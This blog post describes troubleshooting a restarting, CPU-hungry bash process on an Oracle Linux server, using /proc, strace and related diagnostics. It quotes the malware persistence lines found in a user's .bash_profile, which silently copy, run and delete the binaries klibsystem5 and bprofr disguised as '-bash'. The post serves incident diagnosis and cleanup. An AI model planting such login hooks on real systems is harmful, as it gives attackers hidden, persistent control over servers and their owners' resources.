Decoding the High CPU Usage Mystery: A Bash Shell Odyssey
This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. This systematic investigation identified malicious scripts causing the high CPU usage. This blog post also offers valuable insights into troubleshooting bash process issues and highlights the importance of secure system configurations.
Note that, this is based on a real story. (an issue reported to me through my forum: Erman Arslan's Oracle Forum)
The Case:
Customer, encountered a bash process consuming 98% CPU. Killing it only brought temporary relief as it automatically restarts.
The Investigation Begins:
I requested more information to understand the process's behavior. Customer provided the top
command output, revealed the bash process with a high CPU usage.
Digging Deeper:
I suggested using ps
with the -elf
flag to get detailed process information. This revealed the bash process is in the sleeping state (s
). Analyzing the /proc/8879/cmdline
file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.
Next, I requested the output of w
to see logged-in users and processes. This helped rule out user interaction as the cause.
Process Examination:
I instructed customer to examine the contents of the bash process's working directory (/proc/8879/cwd
) and open file descriptors (cd /proc/8879/fd/; ls -la). This revealed the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll
).
Background info:
Unknown process with -bash not showing it: This process might be a child process spawned by the bash shell itself, or another system service running in the background.
4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.
It is probably a OS process.. Probably, OS or a daemon starts it.. It may belong to a monitoring process such as systemd-monitor.
*Use ps aux or pstree to get a detailed listing of running processes. Look for processes with a parent process ID (PPID) matching the bash shell (bash).Stracing the System Call:
I analyzed the output of strace
on the process. This confirmed the bash process was stuck in the epoll_pwait
system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:
epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.
The arguments to epoll_pwait specify the epoll instance, timeout values, and number of events to wait for.
Analysis of strace Output:
The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).
Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.
Suggested more investigation:
- Check cron jobs and systemd services for any entries that might be starting the bash process.
- Review system logs (
/var/log/messages
and dmesg
) for any errors related to the process. - Investigate Script Purpose.. If the script is legitimate, investigate its purpose and modify it to avoid excessive I/O calls and resource usage.
- Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This was a complex approach and should have been only be attempted with a thorough understanding of the potential consequences.
- Suggested commands for getting information on the context :
- pstree
- cat /proc/<pid>/cmdline
- cat /proc/<pid>/cwd
- cd /proc/<pid>/fd; ls -al
- ls -l /proc/<pid>/cwd
- strace -p <pid>
- lsof -p <pid>
- crontab -l
- systemd services with systemctl list-unit-files and systemctl status <service_name>.
- cat .bash_profile (customer discovered this one.. by the help of the suggestions)
The Culprit Revealed:
With the provided guidance, customer discovered a suspicious entry in his .bash_profile
that was designed to automatically copy and execute a script (/tmp/-bash
). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll
descriptor and the process waiting for I/O.
--
I can see, there is an entry made in .bash_profile by automatically. please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null--
*The system was affected by klibsystem4 and bprofr.. These were malwares..
Suggestions for the fix:
- Manual removal of the malware(s) - klibsystem5 & bprofr , by discovering their source files and the affected system files and deleting(purifying in the case of the system files) all of them one by one.
- Migrating the affected applications / databases to a new server.. This might be a better option in the case we can't be sure about the removal of whole of the malware(s). But if we migrate, there is a risk that we migrate the malware too. So a careful and delicate work is required..